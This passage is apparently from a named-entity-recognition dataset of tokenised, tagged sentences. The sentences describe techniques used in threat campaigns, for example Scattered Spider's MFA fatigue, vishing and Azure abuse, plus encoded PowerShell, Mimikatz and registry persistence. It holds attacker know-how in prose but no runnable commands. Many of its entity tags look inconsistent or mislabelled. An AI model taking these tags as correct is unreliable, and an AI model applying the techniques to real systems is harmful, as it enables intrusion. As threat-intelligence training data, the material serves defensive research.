"and", - "other", - "tools", - "to", - "machines", - "in", - "the", - "network", - "using", - "AnyDesk", - "and", - "PDQ", - "Deploy." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "During", - "C0018,", - "AvosLocker", - "was", - "disguised", - "using", - "the", - "victim", - "company", - "name", - "as", - "the", - "filename." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "For", - "C0018,", - "the", - "threat", - "actors", - "renamed", - "a", - "Sliver", - "payload", - "to", - "`vmware_kb.exe`." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "During", - "C0018,", - "the", - "threat", - "actors", - "used", - "the", - "SoftPerfect", - "Network", - "Scanner", - "for", - "network", - "scanning." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0018,", - "the", - "threat", - "actors", - "opened", - "a", - "variety", - "of", - "ports,", - "including", - "ports", - "28035,", - "32467,", - "41578,", - "and", - "46892,", - "to", - "establish", - "RDP", - "connections." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "During", - "C0018,", - "the", - "threat", - "actors", - "used", - "encoded", - "PowerShell", - "scripts", - "for", - "execution." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0018,", - "the", - "threat", - "actors", - "used", - "AnyDesk", - "to", - "transfer", - "tools", - "between", - "systems." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-Purp", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0018,", - "the", - "threat", - "actors", - "opened", - "a", - "variety", - "of", - "ports", - "to", - "establish", - "RDP", - "connections,", - "including", - "ports", - "28035,", - "32467,", - "41578,", - "and", - "46892." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0018,", - "the", - "threat", - "actors", - "used", - "`rundll32`", - "to", - "run", - "Mimikatz." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "During", - "C0018,", - "the", - "threat", - "actors", - "used", - "PDQ", - "Deploy", - "to", - "move", - "AvosLocker", - "and", - "tools", - "across", - "the", - "network." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0018,", - "the", - "threat", - "actors", - "ran", - "`nslookup`", - "and", - "Advanced", - "IP", - "Scanner", - "on", - "the", - "target", - "network." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0018,", - "the", - "threat", - "actors", - "collected", - "`whoami`", - "information", - "via", - "PowerShell", - "scripts." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "For", - "C0018,", - "the", - "threat", - "actors", - "acquired", - "a", - "variety", - "of", - "open", - "source", - "tools,", - "including", - "Mimikatz,", - "Sliver,", - "SoftPerfect", - "Network", - "Scanner,", - "AnyDesk,", - "and", - "PDQ", - "Deploy." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "B-Way", - "I-Tool", - "O", - "B-Way", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "During", - "C0018,", - "the", - "threat", - "actors", - "used", - "HTTP", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0018,", - "the", - "threat", - "actors", - "used", - "WMIC", - "to", - "modify", - "administrative", - "settings", - "on", - "both", - "a", - "local", - "and", - "a", - "remote", - "host,", - "likely", - "as", - "part", - "of", - "the", - "first", - "stages", - "for", - "their", - "lateral", - "movement;", - "they", - "also", - "used", - "WMI", - "Provider", - "Host", - "(`wmiprvse.exe`)", - "to", - "execute", - "a", - "variety", - "of", - "encoded", - "PowerShell", - "scripts", - "using", - "the", - "`DownloadString`", - "method." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "During", - "C0021,", - "the", - "threat", - "actors", - "used", - "SSL", - "via", - "TCP", - "port", - "443", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0021,", - "the", - "threat", - "actors", - "used", - "encoded", - "PowerShell", - "commands." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "During", - "C0021,", - "the", - "threat", - "actors", - "deobfuscated", - "encoded", - "PowerShell", - "commands", - "including", - "use", - "of", - "the", - "specific", - "string", - "`'FromBase'+0x40+'String'`,", - "in", - "place", - "of", - "`FromBase64String`", - "which", - "is", - "normally", - "used", - "to", - "decode", - "base64." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "For", - "C0021,", - "the", - "threat", - "actors", - "registered", - "domains", - "for", - "use", - "in", - "C2." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "For", - "C0021,", - "the", - "threat", - "actors", - "used", - "legitimate", - "but", - "compromised", - "domains", - "to", - "host", - "malicious", - "payloads." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "For", - "C0021,", - "the", - "threat", - "actors", - "embedded", - "a", - "base64-encoded", - "payload", - "within", - "a", - "LNK", - "file." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0021,", - "the", - "threat", - "actors", - "downloaded", - "additional", - "tools", - "and", - "files", - "onto", - "victim", - "machines." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0021,", - "the", - "threat", - "actors", - "lured", - "users", - "into", - "clicking", - "a", - "malicious", - "link", - "which", - "led", - "to", - "the", - "download", - "of", - "a", - "ZIP", - "archive", - "containing", - "a", - "malicious", - ".LNK", - "file." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "During", - "C0021,", - "the", - "threat", - "actors", - "used", - "TCP", - "for", - "some", - "C2", - "communications." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0021,", - "the", - "threat", - "actors", - "used", - "obfuscated", - "PowerShell", - "to", - "extract", - "an", - "encoded", - "payload", - "from", - "within", - "an", - ".LNK", - "file." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "During", - "C0021,", - "the", - "threat", - "actors", - "used", - "`rundll32.exe`", - "to", - "execute", - "the", - "Cobalt", - "Strike", - "Beacon", - "loader", - "DLL." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0021,", - "the", - "threat", - "actors", - "sent", - "phishing", - "emails", - "with", - "unique", - "malicious", - "links,", - "likely", - "for", - "tracking", - "victim", - "clicks." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "For", - "C0021,", - "the", - "threat", - "actors", - "used", - "Cobalt", - "Strike", - "configured", - "with", - "a", - "modified", - "variation", - "of", - "the", - "publicly", - "available", - "Pandora", - "Malleable", - "C2", - "Profile." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "For", - "C0021,", - "the", - "threat", - "actors", - "uploaded", - "malware", - "to", - "websites", - "under", - "their", - "control." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0021,", - "the", - "threat", - "actors", - "used", - "HTTP", - "for", - "some", - "of", - "their", - "C2", - "communications." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0026,", - "the", - "threat", - "actors", - "used", - "WinRAR", - "to", - "collect", - "documents", - "on", - "targeted", - "systems.", - "The", - "threat", - "actors", - "appeared", - "to", - "only", - "exfiltrate", - "files", - "created", - "after", - "January", - "1,", - "2021." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Time", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0026,", - "the", - "threat", - "actors", - "split", - "encrypted", - "archives", - "containing", - "stolen", - "files", - "and", - "information", - "into", - "3MB", - "parts", - "prior", - "to", - "exfiltration." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0026,", - "the", - "threat", - "actors", - "collected", - "documents", - "from", - "compromised", - "hosts." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "For", - "C0026,", - "the", - "threat", - "actors", - "re-registered", - "expired", - "C2", - "domains", - "previously", - "used", - "for", - "ANDROMEDA", - "malware." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "During", - "C0026,", - "the", - "threat", - "actors", - "re-registered", - "a", - "ClouDNS", - "dynamic", - "DNS", - "subdomain", - "which", - "was", - "previously", - "used", - "by", - "ANDROMEDA." - ], - "ner_tags": [ - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "During", - "C0026,", - "the", - "threat", - "actors", - "downloaded", - "malicious", - "payloads", - "onto", - "select", - "compromised", - "hosts." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0027,", - "Scattered", - "Spider", - "used", - "aws_consoler", - "to", - "create", - "temporary", - "federated", - "credentials", - "for", - "fake", - "users", - "in", - "order", - "to", - "obfuscate", - "which", - "AWS", - "credential", - "is", - "compromised", - "and", - "enable", - "pivoting", - "from", - "the", - "AWS", - "CLI", - "to", - "console", - "sessions", - "without", - "MFA." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-Idus", - "B-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0027,", - "Scattered", - "Spider", - "used", - "IAM", - "manipulation", - "to", - "gain", - "persistence", - "and", - "to", - "assume", - "or", - "elevate", - "privileges." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-Idus", - "B-HackOrg", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0027,", - "Scattered", - "Spider", - "accessed", - "Azure", - "AD", - "to", - "download", - "bulk", - "lists", - "of", - "group", - "members", - "and", - "to", - "identify", - "privileged", - "users,", - "along", - "with", - "the", - "email", - "addresses", - "and", - "AD", - "attributes." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-Idus", - "B-HackOrg", - "O", - "B-Features", - "O", - "O", - "B-Purp", - "O", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0027,", - "Scattered", - "Spider", - "leveraged", - "compromised", - "credentials", - "from", - "victim", - "users", - "to", - "authenticate", - "to", - "Azure", - "tenants." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-Idus", - "B-HackOrg", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0027,", - "Scattered", - "Spider", - "accessed", - "Azure", - "AD", - "to", - "download", - "bulk", - "lists", - "of", - "group", - "members", - "and", - "their", - "Active", - "Directory", - "attributes." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-Idus", - "B-HackOrg", - "O", - "B-Features", - "B-Exp", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0027,", - "Scattered", - "Spider", - "used", - "compromised", - "Azure", - "credentials", - "for", - "credential", - "theft", - "activity", - "and", - "lateral", - "movement", - "to", - "on-premises", - "systems." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-Idus", - "B-HackOrg", - "O", - "I-Way", - "O", - "B-Way", - "O", - "B-SamFile", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0027,", - "Scattered", - "Spider", - "used", - "access", - "to", - "the", - "victim's", - "Azure", - "tenant", - "to", - "create", - "Azure", - "VMs." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "During", - "C0027,", - "Scattered", - "Spider", - "sent", - "phishing", - "messages", - "via", - "SMS", - "to", - "steal", - "credentials." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-Idus", - "B-HackOrg", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "During", - "C0027,", - "Scattered", - "Spider", - "performed", - "domain", - "replication." - ], - "ner_tags": [ - "O", - "B-Features", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0027,", - "Scattered", - "Spider", - "accessed", - "victim", - "OneDrive", - "environments", - "to", - "search", - "for", - "VPN", - "and", - "MFA", - "enrollment", - "information,", - "help", - "desk", - "instructions,", - "and", - "new", - "hire", - "guides." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0027,", - "Scattered", - "Spider", - "registered", - "devices", - "for", - "MFA", - "to", - "maintain", - "persistence", - "through", - "victims'", - "VPN." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0027,", - "Scattered", - "Spider", - "accessed", - "Azure", - "AD", - "to", - "identify", - "email", - "addresses." - ], - "ner_tags": [ - "O", - "B-Features", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0027,", - "Scattered", - "Spider", - "exploited", - "CVE-2021-35464", - "in", - "the", - "ForgeRock", - "Open", - "Access", - "Management", - "(OpenAM)", - "application", - "server", - "to", - "gain", - "initial", - "access." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-Idus", - "B-HackOrg", - "O", - "B-Features", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "During", - "C0027,", - "Scattered", - "Spider", - "used", - "Citrix", - "and", - "VPNs", - "to", - "persist", - "in", - "compromised", - "environments." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-Idus", - "B-HackOrg", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0027,", - "Scattered", - "Spider", - "impersonated", - "legitimate", - "IT", - "personnel", - "in", - "phone", - "calls", - "and", - "text", - "messages", - "either", - "to", - "direct", - "victims", - "to", - "a", - "credential", - "harvesting", - "site", - "or", - "getting", - "victims", - "to", - "run", - "commercial", - "remote", - "monitoring", - "and", - "management", - "(RMM)", - "tools." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-Idus", - "B-HackOrg", - "O", - "O", - "I-Org", - "I-Org", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "During", - "C0027,", - "Scattered", - "Spider", - "downloaded", - "tools", - "using", - "victim", - "organization", - "systems." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "B-Area", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0027,", - "Scattered", - "Spider", - "attempted", - "to", - "gain", - "access", - "by", - "continuously", - "sending", - "MFA", - "messages", - "to", - "the", - "victim", - "until", - "they", - "accept", - "the", - "MFA", - "push", - "challenge." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0027,", - "used", - "RustScan", - "to", - "scan", - "for", - "open", - "ports", - "on", - "targeted", - "ESXi", - "appliances." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0027,", - "Scattered", - "Spider", - "used", - "SSH", - "tunneling", - "in", - "targeted", - "environments." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-Idus", - "B-HackOrg", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0027,", - "Scattered", - "Spider", - "installed", - "the", - "open-source", - "rsocx", - "reverse", - "proxy", - "tool", - "on", - "a", - "targeted", - "ESXi", - "appliance." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0027,", - "Scattered", - "Spider", - "directed", - "victims", - "to", - "run", - "remote", - "monitoring", - "and", - "management", - "(RMM)", - "tools." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "During", - "C0027,", - "Scattered", - "Spider", - "accessed", - "victim", - "SharePoint", - "environments", - "to", - "search", - "for", - "VPN", - "and", - "MFA", - "enrollment", - "information,", - "help", - "desk", - "instructions,", - "and", - "new", - "hire", - "guides." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0027,", - "Scattered", - "Spider", - "sent", - "Telegram", - "messages", - "impersonating", - "IT", - "personnel", - "to", - "harvest", - "credentials." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-Idus", - "B-HackOrg", - "O", - "B-Way", - "I-Way", - "O", - "I-Org", - "I-Org", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0027,", - "Scattered", - "Spider", - "used", - "phone", - "calls", - "to", - "instruct", - "victims", - "to", - "navigate", - "to", - "credential-harvesting", - "websites." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-Idus", - "B-HackOrg", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0027,", - "Scattered", - "Spider", - "impersonated", - "legitimate", - "IT", - "personnel", - "in", - "phone", - "calls", - "to", - "direct", - "victims", - "to", - "download", - "a", - "remote", - "monitoring", - "and", - "management", - "(RMM)", - "tool", - "that", - "would", - "allow", - "the", - "adversary", - "to", - "remotely", - "control", - "their", - "system." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-Idus", - "B-HackOrg", - "O", - "O", - "I-Org", - "I-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "C0027,", - "Scattered", - "Spider", - "obtained", - "and", - "used", - "multiple", - "tools", - "including", - "the", - "LINpeas", - "privilege", - "escalation", - "utility,", - "aws_consoler,", - "rsocx", - "reverse", - "proxy,", - "Level", - "RMM", - "tool,", - "and", - "RustScan", - "port", - "scanner." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "B-Way", - "B-Way", - "I-Tool", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "B-Way", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "During", - "C0027,", - "Scattered", - "Spider", - "downloaded", - "tools", - "from", - "sites", - "including", - "file.io,", - "GitHub,", - "and", - "paste.ee." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "During", - "C0027,", - "Scattered", - "Spider", - "used", - "Windows", - "Management", - "Instrumentation", - "(WMI)", - "to", - "move", - "laterally", - "via", - "Impacket." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-Idus", - "B-HackOrg", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "C0032", - "campaign,", - "TEMP.Veles", - "used", - "VPN", - "access", - "to", - "persist", - "in", - "the", - "victim", - "environment." - ], - "ner_tags": [ - "O", - "O", - "B-Org", - "B-OffAct", - "B-Idus", - "O", - "B-Tool", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "C0032", - "campaign,", - "TEMP.Veles", - "routinely", - "deleted", - "tools,", - "logs,", - "and", - "other", - "files", - "after", - "they", - "were", - "finished", - "with", - "them." - ], - "ner_tags": [ - "O", - "O", - "B-Org", - "B-OffAct", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "C0032", - "campaign,", - "TEMP.Veles", - "modified", - "and", - "added", - "entries", - "within", - "<code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows", - "NT\\CurrentVersion\\Image", - "File", - "Execution", - "Options</code>", - "to", - "maintain", - "persistence." - ], - "ner_tags": [ - "O", - "O", - "B-Org", - "B-OffAct", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "C0032", - "campaign,", - "TEMP.Veles", - "used", - "Mimikatz", - "and", - "a", - "custom", - "tool,", - "SecHack,", - "to", - "harvest", - "credentials." - ], - "ner_tags": [ - "O", - "O", - "B-Org", - "B-OffAct", - "B-Idus", - "O", - "B-Way", - "O", - "O", - "I-Tool", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "C0032", - "campaign,", - "TEMP.Veles", - "used", - "staging", - "folders", - "that", - "are", - "infrequently", - "used", - "by", - "legitimate", - "users", - "or", - "processes", - "to", - "store", - "data", - "for", - "exfiltration", - "and", - "tool", - "deployment." - ], - "ner_tags": [ - "O", - "O", - "B-Org", - "B-OffAct", - "B-Idus", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "C0032", - "campaign,", - "TEMP.Veles", - "renamed", - "files", - "to", - "look", - "like", - "legitimate", - "files,", - "such", - "as", - "Windows", - "update", - "files", - "or", - "Schneider", - "Electric", - "application", - "files." - ], - "ner_tags": [ - "O", - "O", - "B-Org", - "B-OffAct", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "C0032", - "campaign,", - "TEMP.Veles", - "used", - "port-protocol", - "mismatches", - "on", - "ports", - "such", - "as", - "443,", - "4444,", - "8531,", - "and", - "50501", - "during", - "C2." - ], - "ner_tags": [ - "O", - "O", - "B-Org", - "B-OffAct", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "C0032", - "campaign,", - "TEMP.Veles", - "used", - "PowerShell", - "to", - "perform", - "timestomping." - ], - "ner_tags": [ - "O", - "O", - "B-Org", - "B-OffAct", - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "C0032", - "campaign,", - "TEMP.Veles", - "used", - "encrypted", - "SSH-based", - "PLINK", - "tunnels", - "to", - "transfer", - "tools", - "and", - "enable", - "RDP", - "connections", - "throughout", - "the", - "environment." - ], - "ner_tags": [ - "O", - "O", - "B-Org", - "B-OffAct", - "B-Idus", - "O", - "B-Tool", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "C0032", - "campaign,", - "TEMP.Veles", - "utilized", - "RDP", - "throughout", - "an", - "operation." - ], - "ner_tags": [ - "O", - "O", - "B-Org", - "B-OffAct", - "B-Idus", - "O", - "B-Way", - "O", - "O", - 